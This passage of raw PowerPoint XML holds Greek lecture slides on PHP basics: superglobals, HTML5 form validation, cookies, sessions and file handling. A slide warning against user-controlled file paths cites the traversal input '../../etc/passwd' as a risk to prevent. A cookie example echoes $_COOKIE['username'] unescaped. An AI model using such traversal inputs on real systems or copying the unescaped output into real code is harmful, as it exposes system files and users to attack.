          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1941093"/>
            <a:ext cx="11450337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διαθέτει χρήσιμες ενσωματωμένες μεταβλητές καθολικού χαρακτήρα (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superglobals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υπάρχει περιορισμός πρόσβασης / εμβέλειας  μπορούν να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προσπελαστούν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από παντού  οποιοδήποτε αρχείο / συνάρτηση / αντικείμενο / κλάση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μορφή πίνακα  διαθέτουν πληροφορίες που (α) αφορούν περιβάλλον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ή έχουν εισαχθεί από χρήστη σε φόρμα κλπ.  διαθέσιμες μετά την έκδοση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4.1 PHP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Ονοματολογία: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ΜΟΝΟ κεφαλαία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Αρχίζουν ΠΑΝΤΑ με κάτω παύλα (εκτός της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$GLOBALS)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6480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93067-1AE5-4F70-A688-3BBA7AF75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1FACA-FE2E-2A73-3B44-5D8B2C133F9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HTML5 validation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FF30990-CF82-96B7-76AD-454AB2A7648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4013197-0D0C-79F8-D884-0E50B507139C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805542" y="2559851"/>
            <a:ext cx="10580915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type="email" required&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4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required →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πεδίο δεν μπορεί να είναι κενό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pattern="" → regex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type="email" →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ενσωματωμένος έλεγχος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email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type="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 →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έλεγχος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min="", max=""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maxlength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=“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"step=""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χρήσιμο για αριθμούς)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ο χρήστης γράψει κάτι χωρίς @ → αυτόματα εμφανίζει λάθος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581149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E7FD7-065E-9928-936F-82A68C7D8E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C200A-7344-A491-B559-DBE3F2CEF9D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HTML regex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στο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input tag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DC774C5-89CE-6CCF-DD96-CBDEB02B958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8002AB4-4696-5943-0332-F28949409AC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805542" y="1946692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&lt;input type="text" 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name="username" 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pattern="^[A-Za-z0-9_]{3,15}$"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required&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4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HTML5 επιτρέπει να ενσωματώσετε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regex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απευθείας στο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input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Μόνο γράμματα, αριθμοί και _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Από 3 έως 15 χαρακτήρες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Πρέπει να υπάρχει τιμή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required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η τιμή δεν ταιριάζει → η φόρμα δεν υποβάλλεται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2694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0636C5-59EF-0C35-8F14-1FFBFF6DE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43EB28-011D-6DE1-B7AC-77A65FEE55E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8618720-3E7E-C9B2-2409-F621927A6B0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FCE399-03AF-E595-D4FB-F5F5EE1A5D51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1153885" y="2091766"/>
            <a:ext cx="5290458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input:required:invalid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{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border-color: #b03535;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box-shadow: 0 0 5px #d45252;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input:required:valid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{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border-color: #28921f;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box-shadow: 0 0 5px #5cd053;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lvl="4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ACB4D05-162E-7D05-DF12-E039293ACEAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3570516" y="2559851"/>
            <a:ext cx="7903028" cy="25699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171700" lvl="4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Ένα λάθος πεδίο γίνεται κόκκινο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Ένα σωστό πεδίο γίνεται πράσινο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χρήστης βλέπει άμεσα τι είναι σωστό και τι λάθος  άνετη εμπειρία και μείωση σφαλμάτων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3020328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5C124-46CE-B474-CDC1-01F85DC53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8D702-E89B-D6A6-886B-DF2ECDC8EDA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4F0BE03-E62D-8040-7421-9824A52655D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7C674B-6151-B1B7-495F-AEF94657AF5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805542" y="1946692"/>
            <a:ext cx="1058091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&lt;.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form_hint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{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background: #d45252;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color: white;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padding: 3px 6px;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display: none;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position: absolute;}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input:focus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+ .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form_hint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{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2171700" lvl="4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display: inline;}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4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Όταν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input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έχει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focus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→ εμφανίζεται το μήνυμα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Όταν χάνει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focus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→ εξαφανίζεται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Μπορεί να εμφανίζει οδηγίες ή λάθη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7535787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CF3E8-6526-4579-3E2F-C46F1E95F2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A886D-8326-D651-2174-6FEF330D072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Cookies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2EE38BA-0754-B8A2-4FA7-A062A54FD222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D4B6B4E-4480-61BF-91BD-C5A57DCC4E65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909174" y="1598349"/>
            <a:ext cx="10580915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μικρό κομμάτι δεδομένων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αποθηκεύεται στον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όχι στον server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Χρησιμοποιείται για να “θυμάται” πληροφορίες ανάμεσα σε επισκέψεις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Βασικά χαρακτηριστικά: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Είναι ζευγάρι όνομα → τιμή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key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value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Αποθηκεύονται από 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Συνοδεύουν κάθε επόμενο HTTP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request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προς τον ίδιο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domain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Έχουν ημερομηνία λήξης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Μπορούν να περιοριστούν ανά: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marL="2286000" lvl="4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Domain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286000" lvl="4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Path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286000" lvl="4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Secure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flag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286000" lvl="4" indent="-457200" algn="just">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü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HttpOnly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flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298392346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4D7A0-E773-6303-B3EE-C039F0E01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22BB5-9BC6-670B-BCD7-578177592FE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Cookies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7C1BB40-79BA-CB3C-1939-1043F1EF867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4AE8AD-09C4-7225-00FE-92CD90185C1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805542" y="1946692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Γιατί χρειάζονται;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“θυμάται” η σελίδα ότι ο χρήστης είναι συνδεδεμένος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αποθηκεύει προτιμήσεις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language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theme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καλάθια αγορών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παρακολούθηση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προσωποποίηση περιεχομένου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Χωρίς cookies, ιστοσελίδα δεν μπορεί να θυμηθεί τίποτα μεταξύ δύο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clicks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2771031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94EB02-DA89-9A10-98F0-C0A59AAB77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A7ADD-5902-BFEC-CDDA-5E9EDDD08AA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Cookies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στο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επίπεδο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137217F-2C93-1FCC-58A4-14352B08672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F90C17-7A73-77C4-EE7E-61DFA8B4562A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805542" y="1946692"/>
            <a:ext cx="1058091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cookies αποστέλλονται και αποθηκεύονται με συγκεκριμένο μηχανισμό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 (PHP)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στέλνει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 header:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2286000" lvl="4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Set-Cookie: username=Alex; expires=Mon, 16 Jan 2030 12:00:00 GMT; path=/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2286000" lvl="4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371600" lvl="2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286000" lvl="4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Αποθηκεύει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τοπικά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743200" lvl="5" indent="-4572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επιστρέφει στον server σε κάθε επόμενο αίτημα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lvl="2"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request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προς τον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περιέχει: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Cookie: username=Alex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μπορεί να “θυμάται” τον χρήστη, παρότι το HTTP είναι πρωτόκολλο χωρίς μνήμη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3052740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3851B-F978-B9EA-EBF4-FB1C9751D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148D5-29CE-402F-BDD2-BAE0721E7B7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cookie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4312A4F-E15F-7E9A-755D-60780AEEFB3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BA2B3E2-F360-C368-EB70-605E632A7895}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805542" y="1968463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setcookie("username", "Maria", time() + 3600);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"username" → όνομα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Maria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 → τιμή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time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 + 3600 → λήξη σε 1 ώρα από τώρα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Από τη στιγμή που σταλεί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το αποθηκεύει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τιμή είναι διαθέσιμη στη PHP μέσω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$_COOKIE['username']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cookies δεν “εμφανίζονται” στην ίδια σελίδα που καλούμε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setcookie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headers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στέλνονται μετά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script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τιμή διαθέσιμη στο επόμενο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request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8203173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23B348-8C7C-F7F6-795B-9BB7076BD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2EE0F-805F-0DB2-82EB-428452F1347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Ανάγνωση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cookie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28C9A7A-B84E-0188-C4DD-CA01C0DE178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8D1488-E65C-4514-54AE-735197BBCFED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805542" y="2199265"/>
            <a:ext cx="1058091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if (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isset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($_COOKIE['username']))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echo "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Καλώς ήρθες ξανά, " . $_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COOKIE['username'];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 else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echo "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υπάρχει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cookie.";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"Η PHP δεν διαβάζει cookies με κάποια ειδική συνάρτηση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Υπάρχει απλώς ένας πίνακας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superglobal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$_COOKIE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cookies αποστέλλονται αυτόματα σε κάθε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request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6560079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B4FBDF-0568-31E2-3752-5D5F9D4BD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2D16E-144C-43EB-0B08-845E3F9F787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Ανάγνωση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cookie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CE1A05F-F595-7153-6EE7-10FF5FF7269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59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6EA86B0-1BAB-0492-D7EF-F738DB6E2685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805542" y="1968463"/>
            <a:ext cx="1058091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if (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isset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($_COOKIE['username']))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echo "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Καλώς ήρθες ξανά, " . $_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COOKIE['username'];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 else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echo "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υπάρχει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cookie.";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δεν διαβάζει cookies με κάποια ειδική συνάρτηση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Υπάρχει απλώς ένας πίνακας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superglobal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$_COOKIE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cookies αποστέλλονται αυτόματα σε κάθε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request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94100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2F613C-6AFE-0F4C-374A-F1F81942C9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93C1B-5A14-DB5D-76DB-D768A26C8C74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Υπερ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-καθολικές μεταβλητές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50CDB83-C926-76B9-5516-1A884E4F726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C65AE7F-04BC-1EB3-0790-87B3E9F32E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039790"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1258276" y="2196773"/>
          <a:ext cx="9553750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8599">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2815854627"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7305151">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="363335277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/>
                        <a:t>Μεταβλητή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Περιγραφή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8013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$GLOBALS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Περιέχει όλες τις καθολικές μεταβλητές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8806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$_SERVER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Πληροφορίες όπως επικεφαλίδες, μονοπάτια – τοποθεσίες σεναρίων </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="el-GR" dirty="0">
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t> παρέχονται από </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>server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30761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$_ENV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Μεταβλητές που παρέχονται από περιβάλλον εγκατάστασης </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>PHP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674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$_GET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Μεταβλητές που παρέχονται από  μέθοδο </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>HTPP GET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8218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$_POST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Μεταβλητές που παρέχονται από  μέθοδο</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> HTPP POST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7134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$_COOKIE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Μεταβλητές που χρησιμοποιούνται ως</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> HTPP cookies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0239132"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="386379">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>$_REQUEST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Πληροφορίες που περιέχει </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>browser </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"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el-GR" dirty="0">
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>γονικός πίνακας των </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>$_GET</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="el-GR" dirty="0"/>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> $_POST, $_COOKIE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4328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$_SESSION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/>
                        <a:t>Μεταβλητές που χρησιμοποιούνται σε σύνοδο (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>session)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52014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$_FILES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/>
                        <a:t>Αρχεία που έχουν ανέβει στον εξυπηρετητή με μέθοδο </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>HTPP POST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9164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824215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68DFE7-8CEF-24A6-5438-EBBA14F723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42B374-9122-FB25-EE87-405B6B9ABE0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Διαγραφή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cookie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A5B40E9-605A-9F09-AE21-C20CB36CE85A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48814A-F175-6FBB-BC61-F64053649361}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702781" y="1967061"/>
            <a:ext cx="10580915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Τα cookies δεν διαγράφονται από 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με άμεση εντολή   server ζητά να λήξουν:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="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setcookie("username", "", time() - 3600);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Θέτουμε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με παλιά ημερομηνία λήξης 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βλέπει ότι έληξε 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αφαιρε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unset($_COOKIE["username"]);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διαγράφει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από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er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αφαιρεί τιμή από τη PHP σε εκείνο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request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06781661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F02F8-A674-BEB7-6E0A-99DC952E8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EDA61-91C4-CBF1-C299-8D196A9F45D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Παράμετροι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cookie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5B348A99-BC56-9BD3-49DA-CEEFAD5D9E6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8F06B8-4D32-EBA3-D305-0300D3DDCD95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702781" y="1967061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setcookie(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"username",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"Maria", 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time() + 3600,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"/",            // path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"example.com",  // domain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true,           // secure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true            //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httponly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ath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Καθορίζει σε ποια URL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ορατό "/" σε όλο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site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omain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Επιτρέπει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κοινό σε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subdomains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ecure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Αν είναι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true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μεταφέρεται μόνο μέσω HTTPS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ttponly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Αν είναι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true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JavaScript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δεν μπορεί να διαβάσει  προστασία από XSS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7910117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9BAC8-6302-7C63-08A7-8BB50FC77E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0BC30A-46BE-97F3-4291-E44283393B5A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Cookie vs Session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A6AD602-7D71-FAE5-DFAC-0905FCFD9FB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604E965-F04D-271C-1FE3-4C66502E7A6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702781" y="1967061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Cookies = αποθηκεύονται στον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Sessions = αποθηκεύονται στον server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Cookies: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εύκολα μεταβλητά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εύκολα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διαβάσιμα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κατάλληλα για απλές προτιμήσεις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έχουν μέγεθος ~4KB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έχουν όρια ασφαλείας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Sessions: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φαίνονται στον χρήστη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Ασφαλέστερα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μπορούν να αποθηκεύσουν αντικείμενα + μεγάλα δεδομένα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χρησιμοποιούν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μόνο για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ID</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222147626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A0BBA8-419E-151F-BC9B-A778BCDEE6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2270B-04FD-B63B-8D2E-F3DBF3DDDFC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session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3AA45A6-4732-EC8C-5966-1B4C0025412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E63702-A60F-12EF-D175-76BBE82046DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702781" y="1967061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Όταν ξεκινήσει ένα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PHP δημιουργεί ένα μοναδικό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ID (π.χ. 6gf84kqs0bsa77p3cc8q7c7sh5)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720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Αποθηκεύει αυτό το ID σε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(συνήθως PHPSESSID)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720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Δημιουργεί ένα αρχείο στον server (ή σε άλλο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storage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που περιέχει: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username=Maria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loggedin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=true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role=admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="just">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4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Σε κάθε νέο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request, browser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στέλνει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 ID → server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φορτώνει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 file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ξέρει ποιος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μίλησεεπειδή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στέλνει το μοναδικό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9239518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3DA742-9030-C852-002B-9A8D7A1DF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B8347-F19A-430A-D12F-B7F1EBF93AF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Session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48F6B61F-6C6B-7DCB-9011-97795E05367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4F8F848-2996-196B-39FD-F38278345817}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908304" y="1908144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Πριν χρησιμοποιηθεί οποιαδήποτε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μεταβλητή, πρέπει να καλέσουμε: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session_start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διαβάζει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PHPSESSID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φορτώνει τα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data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αλλιώς δημιουργεί νέο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από την αρχή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πρέπει να βρίσκεται στην αρχή της σελίδας, πριν παραχθεί HTML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Μετά από αυτό μπορούμε να αποθηκεύσουμε τιμές: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$_SESSION['username'] = 'Nikos';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$_SESSION['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is_admin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'] = true;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2668689560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AF67F6-017E-83A0-1E69-2A76088B4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532D72-6C05-9F24-7D3E-9AE354C82CD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Καταστροφή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Session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6028B4B-37F2-B9F7-D85B-C30BEA0B9B1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EA8D607-8468-E5BE-5B41-16AD7B7D86E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908304" y="1908144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session_start();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session_unset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session_destroy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session_unset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Διαγράφει ΟΛΕΣ τις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μεταβλητές (αλλά αφήνει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 file)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session_destroy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Καταστρέφει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 file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 PHPSESSID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Εξακολουθεί να υπάρχει — πρέπει να το “λήξουμε”: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setcookie("PHPSESSID", "", time() - 3600, "/");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δεν θα στείλει ποτέ ξανά το παλιό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session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id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16149253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59455F-E0A3-010E-6CFA-81642BC01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3C0A1-595D-8370-5559-AA8767C1F86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file handling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DD792C8E-4F8C-15EF-AB8C-5BABF3E9A756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9529CC7-E2F7-8AC3-634D-C0B58B332FC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908304" y="1908144"/>
            <a:ext cx="10580915" cy="433965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PHP μπορεί να διαβάσει και να γράψει αρχεία στον server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HP έχει πλήρη πρόσβαση στο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system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με δυνατότητα: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Ανάγνωσης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Εγγραφής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Διαγραφής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Μετακίνησης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δημιουργίας φακέλων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αλλαγής δικαιωμάτων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γίνει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σωστά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→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σο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βαρά κενά ασφαλείας</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230098493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90420A-5DE3-B02C-B087-37EDEA8653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F5165-B79A-7D44-F7CB-B1CA7093D4F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file handling - fopen():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34D8A95-8AD4-B9D9-10C6-FBFE408C8ACE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172F70-F541-7337-73C8-8A00259D15FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909174" y="2049430"/>
            <a:ext cx="10580915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fopen()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ανοίγει (ή δημιουργεί) ένα αρχείο, και επιστρέφει έναν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handle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Βασική σύνταξη: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$handle = fopen("data.txt", "r");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"data.txt" →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όνομα αρχείου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r" → mode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τρόπος ανοίγματος)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handle → pointer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στο αρχείο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71485420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28742A-6E5E-A355-2D7A-091A7A3A76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6BED7-E478-41B5-695F-2644ED3D9CC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file handling - fopen():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AA96028-9274-2981-4FC3-7066F78DFE10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E50076C-458E-D195-0691-8D9D8C2892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2097241"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1006275" y="2332991"/>
          <a:ext cx="9604828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2414">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3727054440"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4802414">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="42473101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Mode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400" dirty="0"/>
                        <a:t>Σημασία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05608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“r”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Read only </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="el-GR" sz="2400" dirty="0"/>
                        <a:t>(αποτυχία αν δεν υπάρχει)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8131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“w”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Write only (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="el-GR" sz="2400" dirty="0"/>
                        <a:t>δημιουργεί / σβήνει υπάρχον)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464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“a”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Append (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="el-GR" sz="2400" dirty="0"/>
                        <a:t>γράφει στο τέλος)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6258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“x”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Create only if file doesn’t exist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811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“r+”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Read and write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6653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“w+”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/>
                        <a:t>Read and write (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="el-GR" sz="2400" dirty="0"/>
                        <a:t>σβήνει υπάρχον)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97222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/>
                        <a:t>“a+”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Read and append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02267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830313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449383-4168-74D1-6C05-DCBA6D28C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D8890-38DA-D7EB-B9FF-D3CACF10066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file handling - fread ():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5AE1580-1EA6-1135-2E6F-1EAB81E1409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69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ABCFFC-DF10-C9F6-8D8A-640DB696064B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909174" y="2049430"/>
            <a:ext cx="10580915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να διαβάσουμε περιεχόμενο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βασική σύνταξη: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$handle = fopen("data.txt", "r");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$content = fread($handle,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filesize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("data.txt"));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fclose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($handle);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filesize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λέει πόσα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bytes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πρέπει να διαβάσουμε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fread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μπορεί να διαβάσει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binary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και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text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αρχεία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Αφού τελειώσουμε →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fclose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για αποδέσμευση πόρων)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42284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826364-95B9-7A03-B567-9AA1A2B6E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9ED55-01AC-22E3-C0D8-F6FC8782F48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Πίνακας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$_SERVER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698D522-5A23-3E91-047D-81EB2A1AFD11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9EB20A-6E68-5BE9-104F-5ABC18A5EE70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="592853" y="2081770"/>
            <a:ext cx="11450337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'SERVER_NAME':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όνομα του εξυπηρετητή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HTTP_USER_AGENT':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browser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 χρήστη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REMOTE_ADDR':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διεύθυνση του χρήστη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REMOTE_HOST':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host name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'SERVER_ADDR':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IP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διεύθυνση του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server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'SCRIPT_FILENAME':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όνομα του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PHP script 	(absolute)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‘PHP_SELF’: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όνομα του τρέχοντος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script,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σχετικό ως προς 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root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'HTTP_REFERER':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διεύθυνση σελίδας η οποία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οδήγησε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στην τρέχουσα σελίδα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Άλλες πληροφορίες …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argv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', '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', 'GATEWAY_INTERFACE', 'SERVER_SOFTWARE, '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argv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', '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', 'GATEWAY_INTERFACE', 'SERVER_SOFTWARE', 'SERVER_PROTOCOL', 'REQUEST_METHOD', 'QUERY_STRING', 'DOCUMENT_ROOT’,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κ.α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289134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FBC86F-D7AE-BA51-B34A-4DDDB7F78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444E6-28D2-1B7F-292B-E3631972A3D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file handling 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fwrite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():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7085E960-AD52-63E9-2D93-17FF1DCE24B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A7156C4-7E11-F4C4-C7D9-3D199F1AB38E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909174" y="2049430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Εγγραφή δεδομένων σε αρχείο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βασική σύνταξη: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$handle = fopen("log.txt", "a");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fwrite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($handle, "User logged in at " . date("H:i:s") . "\n");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fclose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($handle);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συχνά χρησιμοποιείται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append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("a"):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διαγράφει το υπάρχον περιεχόμενο  προσθέτει νέα γραμμή στο τέλος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"w" — το αρχείο αδειάζει πριν γραφτεί κάτι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ο φάκελος δεν έχει δικαιώματα εγγραφής → PHP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Warning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166441854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66D486-2D96-8F75-3333-C2CB1EF59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E6C0F-B2AF-7022-B84C-581FA28A5E0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Διαγραφή αρχείου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unlink)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95A5EC4-FDC6-1BC8-1ACB-0DD22D5888BB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D50EF3E-935B-E56F-117D-4323F8AE4756}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909174" y="2049430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Διαγραφή αρχείου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βασική σύνταξη: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unlink("old_data.txt");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Η εντολή είναι άμεση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υπάρχει “καλάθι ανακύκλωσης”  Η PHP διαγράφει μόνιμα το αρχείο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path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είναι ελεγχόμενο από χρήστη → τεράστιο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security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risk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Ανάγκη:  (α) ελέγχου πως αρχείο βρίσκεται σε επιτρεπόμενο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directory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(β) αποτροπή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directory traversal (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π.χ. "../../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etc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/passwd")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(γ) αποφυγή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filename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απευθείας σε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GET / POST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8666231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7B70CF-5323-E3B1-43DC-573687392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39463-49FF-F16D-9755-E9B723BA73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92183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existence check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D8E09D8-0523-6479-12E7-DFBA2B27222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7C8A2FA-2218-0D40-14B3-4900C56D3805}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909174" y="2049430"/>
            <a:ext cx="10580915" cy="398570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Πριν διαβάσουμε/γράψουμε, ελέγχουμε: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if (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file_exists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("data.txt")) { ... }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is_file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("data.txt") →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είναι κανονικό αρχείο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is_dir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("images/") →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είναι φάκελος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is_readable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 →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έχει δικαίωμα ανάγνωσης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is_writable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() →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έχει δικαίωμα εγγραφής</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3200045012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5D0F0-F276-783B-549C-35309FC23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21620-C147-BAF0-1B38-0164DDC678C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92183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paths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absolute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vs relative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E05D6A0-CB0A-396A-42DA-636A076AB5A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24033F-0039-97DD-CD6A-3D68F636C24F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
